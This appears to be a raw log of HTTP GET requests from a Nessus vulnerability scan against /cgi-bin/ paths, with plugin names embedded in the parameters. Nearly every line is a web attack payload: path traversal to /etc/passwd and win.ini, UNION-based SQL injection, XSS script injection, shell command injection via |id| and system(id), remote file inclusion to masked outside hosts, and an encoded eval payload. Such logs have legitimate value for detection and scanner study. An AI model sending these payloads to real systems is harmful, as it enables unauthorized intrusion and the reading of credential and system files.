GET /cgi-bin/data/usr HTTP/1.1
GET /cgi-bin/day.php HTTP/1.1
GET /cgi-bin/db/users.dat HTTP/1.1
GET /cgi-bin/db_input.php HTTP/1.1
GET /cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/demos/demo.browse.php?filename=/etc/passwd HTTP/1.1
GET /cgi-bin/detail.asp?nChannel='1 HTTP/1.1
GET /cgi-bin/direct.php?rf=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/directory.php?dir=%3Bcat%20/etc/passwd HTTP/1.1
GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/disp_album.php?id_album=0+or+1=1 HTTP/1.1
GET /cgi-bin/display.cgi?preftemp=temp&page=anonymous&file=|id| HTTP/1.1
GET /cgi-bin/doc/index.php?s=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/docbuilder/top.php HTTP/1.1
GET /cgi-bin/docman/new.php HTTP/1.1
GET /cgi-bin/docs.php?doc=../jpgraph-1.12.1/docs/index HTTP/1.1
GET /cgi-bin/docs/CHANGES HTTP/1.1
GET /cgi-bin/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/doku.php HTTP/1.1
GET /cgi-bin/download.php?language=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/dsweb/Services/User-1%22%3e%3cBODY%20ONLOAD%3dalert('xerox_docushare_dsweb_xss.nasl')%3e HTTP/1.1
GET /cgi-bin/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://xxxxxxxxxx/ HTTP/1.1
GET /cgi-bin/e107_admin/admin.php HTTP/1.1
GET /cgi-bin/eboard40// HTTP/1.1
GET /cgi-bin/eboard40//index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/eclient/IDMLogon2.jsp HTTP/1.1
GET /cgi-bin/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20 HTTP/1.1
GET /cgi-bin/editor/efront_init_tiny_mce.php HTTP/1.1
GET /cgi-bin/editor/filemanager/connectors/php/upload.php?Command=FileUpload&Type=File&CurrentFolder=/fckeditor_currentfolder_file_upload-1410939097.php%2e HTTP/1.1
GET /cgi-bin/embed/day.php?path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/empower?DB=whateverwhatever HTTP/1.1
GET /cgi-bin/emumail.fcgi HTTP/1.1
GET /cgi-bin/encoder.php HTTP/1.1
GET /cgi-bin/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/ericom.min.js HTTP/1.1
GET /cgi-bin/error.php?err=404 HTTP/1.1
GET /cgi-bin/error.php?selected_theme=%3cscript%3ealert(uebimiau_selected_theme_xss.nasl)%3c%2fscript%3e HTTP/1.1
GET /cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl'%20UNION%20SELECT%201410938911,2031552070%20--%20 HTTP/1.1
GET /cgi-bin/event_view.php?eid=34%20UNION%20SELECT%20245225413 HTTP/1.1
GET /cgi-bin/faq.php?action=&type=view&s=&id=-1'%20UNION%20SELECT%200%2c2110978499%2c0%2c0%2c0%2c0%2c0-- HTTP/1.1
GET /cgi-bin/faq/index.php HTTP/1.1
GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1
GET /cgi-bin/fckeditor/editor/filemanager/connectors/connector?Command=CreateFolder&Type=File&CurrentFolder=/%00/&NewFolderName=fckeditor_java_currentfolder_dos.nasl HTTP/1.1
GET /cgi-bin/feedsplitter.php?format=../../../../../../../../../../etc/passwd%00&debug=1 HTTP/1.1
GET /cgi-bin/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini HTTP/1.1
GET /cgi-bin/file.php?path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/filescan HTTP/1.1
GET /cgi-bin/flserv.pl?cmd=exec_flsearch&query=ftplocate_fsite_cmd_exec.nasl&fsite=|id| HTTP/1.1
GET /cgi-bin/fm.php HTTP/1.1
GET /cgi-bin/force-download.php HTTP/1.1
GET /cgi-bin/form.php HTTP/1.1
GET /cgi-bin/forum.php HTTP/1.1
GET /cgi-bin/forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%201073203799-- HTTP/1.1
GET /cgi-bin/forum.php?do=viewtopic&cat=1&topic=1&page=1?<scr ipt>foo</script HTTP/1.1
GET /cgi-bin/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull-- HTTP/1.1
GET /cgi-bin/forum.php?id_article=1&id_forum=-1/**/UNION/**/SELECT%201284646179-- HTTP/1.1
GET /cgi-bin/forum/Database/EZsiteForum.mdb HTTP/1.1
GET /cgi-bin/forum_2.php?msg=10&return=<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/forumdata/data/user.idx HTTP/1.1
GET /cgi-bin/forumdisplay.php?fid=21\
GET /cgi-bin/forums/list.page HTTP/1.1
GET /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1
GET /cgi-bin/fxm.exe HTTP/1.1
GET /cgi-bin/gadgets/Blog/BlogModel.php?path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/gallery/displayCategory.php?basepath=http://xxxxxxxx HTTP/1.1
GET /cgi-bin/generate.cgi HTTP/1.1
GET /cgi-bin/gitweb.cgi HTTP/1.1
GET /cgi-bin/gitweb.perl HTTP/1.1
GET /cgi-bin/gitweb.pl HTTP/1.1
GET /cgi-bin/gm-comments.cgi HTTP/1.1
GET /cgi-bin/gm.cgi HTTP/1.1
GET /cgi-bin/go.cgi|id| HTTP/1.1
GET /cgi-bin/googlesearch/GoogleSearch.php?APP[path][lib]=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/gtcatalog/index.php?function=custom&custom=http://xxxxxxxx/1 HTTP/1.1
GET /cgi-bin/gtcatalog/password.inc HTTP/1.1
GET /cgi-bin/guestbook.php HTTP/1.1
GET /cgi-bin/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 HTTP/1.1
GET /cgi-bin/guestbook/cfooter.php3 HTTP/1.1
GET /cgi-bin/guestbook/view.php?PG=foobar HTTP/1.1
GET /cgi-bin/guestimage.html HTTP/1.1
GET /cgi-bin/help.php HTTP/1.1
GET /cgi-bin/help.php?section='qualiteam_xcart_sql_xss.nasl HTTP/1.1
GET /cgi-bin/help/copyright.html HTTP/1.1
GET /cgi-bin/help/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
GET /cgi-bin/help/index.php?help_file=../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/hints.pl?|id| HTTP/1.1
GET /cgi-bin/historyFrame.html HTTP/1.1
GET /cgi-bin/home.html?0 HTTP/1.1
GET /cgi-bin/home/search.asp?nChannel='1 HTTP/1.1
GET /cgi-bin/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
GET /cgi-bin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/htgrep/file=index.html&hdr=/etc/passwd HTTP/1.1
GET /cgi-bin/htmlscript?../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/htsearch.cgi HTTP/1.1
GET /cgi-bin/htsearch?-c/nonexistent HTTP/1.1
GET /cgi-bin/htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=%3cscript%3ealert('htsearch_sort_xss.nasl')%3c%2fscript%3e&words=htsearch_sort_xss.nasl HTTP/1.1
GET /cgi-bin/htsearch?exclude=%60/etc/passwd%60 HTTP/1.1
GET /cgi-bin/hw3.cgi?daysonly=0).system('id').( HTTP/1.1
GET /cgi-bin/hw3.php?daysonly=0).system(id).( HTTP/1.1
GET /cgi-bin/i-mall.cgi?p=|id| HTTP/1.1
GET /cgi-bin/ideabox/include.php?ideaDir=http://xxxxxxxx HTTP/1.1
GET /cgi-bin/ikonboard.cgi HTTP/1.1
GET /cgi-bin/ikonboard.cgi?act=ST&f=1&t=1&hl=nessus&st=' HTTP/1.1
GET /cgi-bin/image.php?src=system/config/localconfig.php HTTP/1.1
GET /cgi-bin/inc/exif.inc.php?exif_prog=(echo%20-n%20'original_exif_prog_cmd_exec.nasl%3a%20'%3bid)%7c%7cecho HTTP/1.1
GET /cgi-bin/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt%00 HTTP/1.1
GET /cgi-bin/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/inc/header.php/step_one.php?server_inc=http://xxxx./ HTTP/1.1
GET /cgi-bin/inc/pipe.php?HCL_path=http://xxxxxx./ HTTP/1.1
GET /cgi-bin/include.php HTTP/1.1
GET /cgi-bin/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/include/error/autherror.cfm?errorcode=1&FTVAR_LINKP=%22%3e%3c%2fa%3e%3cscript%3ealert('fusetalk_mult_xss.nasl')%3c%2fscript%3e%3ca%20href%3d%22 HTTP/1.1
GET /cgi-bin/include/error/forumerror.cfm?errorno=3 HTTP/1.1
GET /cgi-bin/include/help.php?base=http://xxxxxxxx HTTP/1.1
GET /cgi-bin/include/monitoring/engine/MakeXML.php?fileOreonConf=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/include/sql.php?include_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/include/theme.inc.php?fullpath=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/includer.cgi?template=includer_rcmdexec.nasl HTTP/1.1
GET /cgi-bin/includes/awol-condensed.inc.php?path=http://xxxxxxxx/ HTTP/1.1
GET /cgi-bin/includes/calendar.php?phpc_root_path=http://xxxx./ HTTP/1.1
GET /cgi-bin/includes/config.php?relative_script_path=http://xxxxxxx HTTP/1.1
GET /cgi-bin/includes/converter.inc.php?include_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/includes/db_adodb.php?baseDir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/includes/hnmain.inc.php3?config[incdir]=http://xxxxxxxxxx/ HTTP/1.1
GET /cgi-bin/includes/main.conf HTTP/1.1
GET /cgi-bin/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /cgi-bin/index HTTP/1.1
GET /cgi-bin/index.action HTTP/1.1
GET /cgi-bin/index.asp HTTP/1.1
GET /cgi-bin/index.cfm HTTP/1.1
GET /cgi-bin/index.cfm?catid=1%20SQL HTTP/1.1
GET /cgi-bin/index.cfm?fuseaction=category.display&category_ID=' HTTP/1.1
GET /cgi-bin/index.cgi HTTP/1.1
GET /cgi-bin/index.html HTTP/1.1
GET /cgi-bin/index.js%70 HTTP/1.1
GET /cgi-bin/index.jsp HTTP/1.1
GET /cgi-bin/index.php HTTP/1.1
GET /cgi-bin/index.php/admin/login/ HTTP/1.1
GET /cgi-bin/index.php/index.html HTTP/1.1
GET /cgi-bin/index.php/login HTTP/1.1
GET /cgi-bin/index.php?/auth/login/ HTTP/1.1
GET /cgi-bin/index.php?CID=' HTTP/1.1
GET /cgi-bin/index.php?_language=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/index.php?act=Arcade&do=stats&gameid=1' HTTP/1.1
GET /cgi-bin/index.php?act=help&do=aboutOAT HTTP/1.1
GET /cgi-bin/index.php?act=sm_window&page=event&day=-1%20UNION%20SELECT%201%2c1410938996%2c191609457%20-- HTTP/1.1
GET /cgi-bin/index.php?action=Login&module=Users HTTP/1.1
GET /cgi-bin/index.php?action=login&languages[Nessus]=syscp_1211.nasl&language=Nessus&langs[Nessus][0][file]=/etc/passwd HTTP/1.1
GET /cgi-bin/index.php?action=logout&sesc=1 HTTP/1.1
GET /cgi-bin/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/index.php?action=view&module=resourcesmodule&id=0%20UNION%20SELECT%20-1%2c'exponent_0964.nasl'%2c'Nessus%20test'%2c'O%3a8%3a%22stdClass%22%3a3%3a%7bs%3a3%3a%22mod%22%3bs%3a15%3a%22resourcesmodule%22%3bs%3a3%3a%22src%22%3bs%3a20%3a%22%40random41940ceb78dbb%22%3bs%3a3%3a%22int%22%3bs%3a0%3a%22%22%3b%7d'%2c7%2c0%2c0%2c0%2c0%2c0%2c0%20-- HTTP/1.1
GET /cgi-bin/index.php?album=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/index.php?board=nonexistant1795188651 HTTP/1.1
GET /cgi-bin/index.php?c=access&a=login&ref_c=nessus%22%3e%3cscript%3ealert(424716962)%3c%2fscript%3e&ref_a=projectpier_login_page_xss.nasl%22%3e%3cscript%3ealert(1460280210)%3c%2fscript%3e HTTP/1.1
GET /cgi-bin/index.php?cat=' HTTP/1.1
GET /cgi-bin/index.php?cat_select=<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.1
GET /cgi-bin/index.php?configFile=../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/index.php?do=ext&page=http://xxxxxxxx/file HTTP/1.1
GET /cgi-bin/index.php?doc=http://xxxxxx./foo.php HTTP/1.1
GET /cgi-bin/index.php?edit=nonexistant249757552 HTTP/1.1
GET /cgi-bin/index.php?entry=' HTTP/1.1
GET /cgi-bin/index.php?fields=CHAR(49,39,41,59,101,118,97,108,40,98,97,115,101,54,52,95,100,101,99,111,100,101,40,36,95,83,69,82,86,69,82,91,72,84,84,80,95,78,69,83,83,85,83,95,67,77,68,93,41,41,59,47,47),1 HTTP/1.1
GET /cgi-bin/index.php?file=News&op=phpinfo HTTP/1.1
GET /cgi-bin/index.php?gadget=../../../../../../etc/passwd%00&path=/etc HTTP/1.1
GET /cgi-bin/index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('jaws_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /cgi-bin/index.php?gadget=Glossary&action=view&term=%3cscript%3ealert('jaws_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /cgi-bin/index.php?getApplication=register&checknum=1&args=null HTTP/1.1
GET /cgi-bin/index.php?get_action=get_boot_conf HTTP/1.1
GET /cgi-bin/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1410938905,0x3a,32428285),3,4,5,6,7,8,9,10,11,12,13,14,15,16 HTTP/1.1
GET /cgi-bin/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1410938905,0x3a,32428285),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 HTTP/1.1
GET /cgi-bin/index.php?id=' HTTP/1.1
GET /cgi-bin/index.php?id='UNION/**/SELECT/**/0,0,1356919515,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- HTTP/1.1
GET /cgi-bin/index.php?id=m1ms48leva' HTTP/1.1
GET /cgi-bin/index.php?inc=http://xxxxxx./foo HTTP/1.1
GET /cgi-bin/index.php?include_files[]=&include_files[query_string]=/etc/passwd HTTP/1.1
GET /cgi-bin/index.php?kietu[url_hit]=http://xxxxxxxx/ HTTP/1.1
GET /cgi-bin/index.php?libDir=http://xxxxxxxx HTTP/1.1
GET /cgi-bin/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl HTTP/1.1
GET /cgi-bin/index.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert(%22cerberus_support_center_mult_flaws.nasl%22)%3c%2fscript%3e HTTP/1.1
GET /cgi-bin/index.php?mode=administration HTTP/1.1
GET /cgi-bin/index.php?module=<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/index.php?module=Navigation HTTP/1.1
GET /cgi-bin/index.php?module=Topics&func=view&topicid=-1%20UNION%20SELECT%20null%2cnull%2c'mdpro_topicid_sql_injection.nasl-1410938973'%2cnull%2cnull%2cnull%2cnull%20-- HTTP/1.1
GET /cgi-bin/index.php?module=ew_filemanager&type=admin&func=manager HTTP/1.1
GET /cgi-bin/index.php?name=Your%20Account&profile=anyone%22%3E%3Cscript%3Ealert('Nessus%20was%20here')%3B%3C%2Fscript%3E HTTP/1.1
GET /cgi-bin/index.php?op=Default&Date=200607'%20UNION%20SELECT%201%2c405390421%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
GET /cgi-bin/index.php?op=ViewAlbum&albumId=-1/**/UNION/**/SELECT/**/0,1,1594149138,434134926,1,1,1,1,1--&blogId=1 HTTP/1.1
GET /cgi-bin/index.php?op=ViewArticle&articleId=9999%2f**%2fUNION%2f**%2fSELECT%2f**%2f1410938969%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
GET /cgi-bin/index.php?op=disp&filedata=c3lzdGVtKCdpZCcpOw== HTTP/1.1
GET /cgi-bin/index.php?option=frontpage&Itemid=2|system(id)|1410938942 HTTP/1.1
GET /cgi-bin/index.php?option=weblinks&Itemid=2&catid=-1%20UNION%20SELECT%200%2c1%2c2%2c761705841568%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11-- HTTP/1.1
GET /cgi-bin/index.php?owa_do=base.loginForm HTTP/1.1
GET /cgi-bin/index.php?p='nessus HTTP/1.1
GET /cgi-bin/index.php?page=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/index.php?page=documents&doc=-99%27%20UNION%20SELECT%20null,null,%27nessus%27,%27dcpportal_sql.nasl%27,null,null,null,null,null,null,null,null-- HTTP/1.1
GET /cgi-bin/index.php?post=../config/password HTTP/1.1
GET /cgi-bin/index.php?req_path=http://xxxxxx./ HTTP/1.1
GET /cgi-bin/index.php?search=%3cscript%3ealert('cmsimple_search_xss.nasl')%3b%3c%2fscript%3e&function=search HTTP/1.1
GET /cgi-bin/index.php?search='>%3Cscript%3Ealert('autoindex_search_xss.nasl')%3B%3C%2Fscript%3E&searchMode=f HTTP/1.1
GET /cgi-bin/index.php?search=<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/index.php?selskin=..%2Finc%2Fboxleft.inc%00&xposbox[L][]=%2Fetc%2Fpasswd%00 HTTP/1.1
GET /cgi-bin/index.php?sensor_program=%3cscript%3ealert('phpsysinfo_multiple_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /cgi-bin/index.php?setLang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/index.php?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/index.php?show=/etc/passwd HTTP/1.1
GET /cgi-bin/index.php?site=../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/index.php?src=1&_common=1&time=1410938882&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/index.php?string=' HTTP/1.1
GET /cgi-bin/index.php?template=../../../loudblog/custom/config.php%00 HTTP/1.1
GET /cgi-bin/index.php?templates_dir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/index.php?user_langue=../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/index.php?x=browse&category='UNION%20SELECT%20'1'%2c'2'%2c'pixelpost_category_sql_injection.nasl'%2c'1410938951'%2c'5'-- HTTP/1.1
GET /cgi-bin/index.phtml HTTP/1.1
GET /cgi-bin/index.phtml?mode=view&album=`id`&pic=A=10.jpg&dispsize=640&start=0 HTTP/1.1
GET /cgi-bin/index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60; HTTP/1.1
GET /cgi-bin/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1 HTTP/1.1
GET /cgi-bin/info.dat HTTP/1.1
GET /cgi-bin/info.php HTTP/1.1
GET /cgi-bin/info2www HTTP/1.1
GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.1
GET /cgi-bin/insertorder.cfm?CFID=1&CFTOKEN=1%20UNION%20SELECT%201%2c2%2c3%2c4%2cstorename%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%20from%20Params%22having%201%3d1 HTTP/1.1
GET /cgi-bin/install.php?newlang=../../cpg_error.log%00 HTTP/1.1
GET /cgi-bin/interface/index.do HTTP/1.1
GET /cgi-bin/ion-p.exe?page=../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/ion-p.exe?page=c:\\\\winnt\\\\win.ini HTTP/1.1
GET /cgi-bin/item.fts?href=%22%3E%3Cscript%3Ealert(%22ftgate_44002.nasl%22)%3C%2Fscript%3E%3B HTTP/1.1
GET /cgi-bin/jammail.pl?job=showoldmail&mail=|id| HTTP/1.1
GET /cgi-bin/javascript.php?abs_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/jcart-relay.php HTTP/1.1
GET /cgi-bin/jgs_portal_statistik.php?meinaction=themen&month=1&year=1' HTTP/1.1
GET /cgi-bin/js/scripts.php?load=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/js/vendors.php?file=../../../../../../../../../../etc/passwd%00nessus.js HTTP/1.1
GET /cgi-bin/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
GET /cgi-bin/kernel/loadkernel.php?installPath=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/kvm.cgi?&file=login HTTP/1.1
GET /cgi-bin/landesk/vboot/default.winpemanaged HTTP/1.1
GET /cgi-bin/lang/index.php?file=/etc/passwd HTTP/1.1
GET /cgi-bin/lang/lang.php?lang_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/language.php?data_dir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/lg.php HTTP/1.1
GET /cgi-bin/lib.inc.php?pm_path=http://xxxxxxxx&sfx=.txt HTTP/1.1
GET /cgi-bin/lib/OWL_API.php?xrms_file_root=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /cgi-bin/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem(id)%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
GET /cgi-bin/lib/authform.inc.php?path_pre=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/lib/dbman_filter.inc.php?lib_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/lib/version.phps HTTP/1.1
GET /cgi-bin/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /cgi-bin/library.cgi HTTP/1.1
GET /cgi-bin/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /cgi-bin/library/lib.php?root=http://xxxxxxxxxxx HTTP/1.1
GET /cgi-bin/list.php HTTP/1.1
GET /cgi-bin/listinfo/ HTTP/1.1
GET /cgi-bin/listing.php HTTP/1.1
GET /cgi-bin/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
GET /cgi-bin/livre_include.php?no_connect=lol&chem_absolu=http://xxxxxx./ HTTP/1.1
GET /cgi-bin/loader-wizard.php?page=default HTTP/1.1
GET /cgi-bin/loadpage.cgi HTTP/1.1
GET /cgi-bin/logbook.pl?file=../../../../../../../../../../bin/cat%20/etc/passwd%00| HTTP/1.1
GET /cgi-bin/logicworks.ini HTTP/1.1
GET /cgi-bin/login HTTP/1.1
GET /cgi-bin/login.action HTTP/1.1
GET /cgi-bin/login.cgi HTTP/1.1
GET /cgi-bin/login.cgi?username=&command=simple&do=edit&password=&file=|id| HTTP/1.1
GET /cgi-bin/login.jsp?lang=en&cntry= HTTP/1.1
GET /cgi-bin/login.mako HTTP/1.1
GET /cgi-bin/login.php HTTP/1.1
GET /cgi-bin/login.php?course=\
GET /cgi-bin/login.php?lang=/../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/login.php?lang=/../../../../../../../../../../../../etc/passwd%00.txt HTTP/1.1
GET /cgi-bin/login.php?return=http://www.nessus.org/ HTTP/1.1
GET /cgi-bin/login.php?url=editgedcoms.php HTTP/1.1
GET /cgi-bin/login.php?user=\
GET /cgi-bin/login.pl HTTP/1.1
GET /cgi-bin/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e%20print%20%22Content-Type%3a%20text%2fplain%0d%0a%0d%0a%22%3bsystem(id)&action=logout HTTP/1.1
GET /cgi-bin/login.wdm HTTP/1.1
GET /cgi-bin/login_page.php HTTP/1.1
GET /cgi-bin/logs/HCDiskQuotaService.csv HTTP/1.1
GET /cgi-bin/lostpass.php HTTP/1.1
GET /cgi-bin/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ HTTP/1.1
GET /cgi-bin/lp HTTP/1.1
GET /cgi-bin/lp/AdminlogonPoint/Logon.do HTTP/1.1
GET /cgi-bin/lsg2.cgi HTTP/1.1
GET /cgi-bin/mail.cgi HTTP/1.1
GET /cgi-bin/mail.php?id='/**/UNION/**/SELECT/**/1,2,1410939002,4--&blog=1 HTTP/1.1
GET /cgi-bin/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
GET /cgi-bin/main.php HTTP/1.1
GET /cgi-bin/man-cgi?-P%20id%20ls HTTP/1.1
GET /cgi-bin/man-cgi?section=0&topic=ls%3bid HTTP/1.1
GET /cgi-bin/man2html?section=-P%20id&topic=w HTTP/1.1
GET /cgi-bin/man2web?program=-P%20id%20ls HTTP/1.1
GET /cgi-bin/manager/ HTTP/1.1
GET /cgi-bin/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/mapserv.exe?map=mapserver_detect.nasl.map HTTP/1.1
GET /cgi-bin/mapserv?map=mapserver_detect.nasl.map HTTP/1.1
GET /cgi-bin/math_sum.mscgi HTTP/1.1
GET /cgi-bin/mathtex.cgi?\\dvips\\dpi{150|id%20%3e%20%24(ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1410938969%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F]%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20's%2f.*dvips.ps%20%2f%2f'%20-e%20's%2fgif%20%3econvert.*%2fgif%2fp'%20%7c%20tee%20%2ftmp%2ffoo4)%20%7c%20echo%20mathtex_dpi_exec.nasl-1410938969%20} HTTP/1.1
GET /cgi-bin/mathtex.pl?\\dvips\\dpi{150|id%20%3e%20%24(ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1410938969%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F]%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20's%2f.*dvips.ps%20%2f%2f'%20-e%20's%2fgif%20%3econvert.*%2fgif%2fp'%20%7c%20tee%20%2ftmp%2ffoo4)%20%7c%20echo%20mathtex_dpi_exec.nasl-1410938969%20} HTTP/1.1
GET /cgi-bin/member.php?action=login HTTP/1.1
GET /cgi-bin/member/index.php HTTP/1.1
GET /cgi-bin/mensajeitor.php HTTP/1.1
GET /cgi-bin/menu_dx.php?SITE_Path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/minis.php?month=../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/misc.php?action=login HTTP/1.1
GET /cgi-bin/misc/audio.php?recording=../version.inc HTTP/1.1
GET /cgi-bin/misc/info.php HTTP/1.1
GET /cgi-bin/mj_wwwusr HTTP/1.1
GET /cgi-bin/mlog.html?screen=/etc/passwd HTTP/1.1
GET /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20\
GET /cgi-bin/module.php?module=osTicket&file=../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/module.php?module=osTicket&file=/modules/osTicket/admin.php HTTP/1.1
GET /cgi-bin/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 HTTP/1.1
GET /cgi-bin/modules.php?name=My_eGallery HTTP/1.1
GET /cgi-bin/modules/Printing/output.php?url=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
GET /cgi-bin/modules/TinyMCE/content_css.php?templateid=-1/**/UNION/**/SELECT/**/1410938973,1,605562922-- HTTP/1.1
GET /cgi-bin/modules/core/module.inc HTTP/1.1
GET /cgi-bin/modules/news/ HTTP/1.1
GET /cgi-bin/modules/phpRPC/server.php HTTP/1.1
GET /cgi-bin/modules/projects/sql/install-0.9.7.php?p=2 HTTP/1.1
GET /cgi-bin/month.php HTTP/1.1
GET /cgi-bin/more.php?id=1' HTTP/1.1
GET /cgi-bin/mpweb/html/help/000/user_help/help/output/config.js HTTP/1.1
GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.1
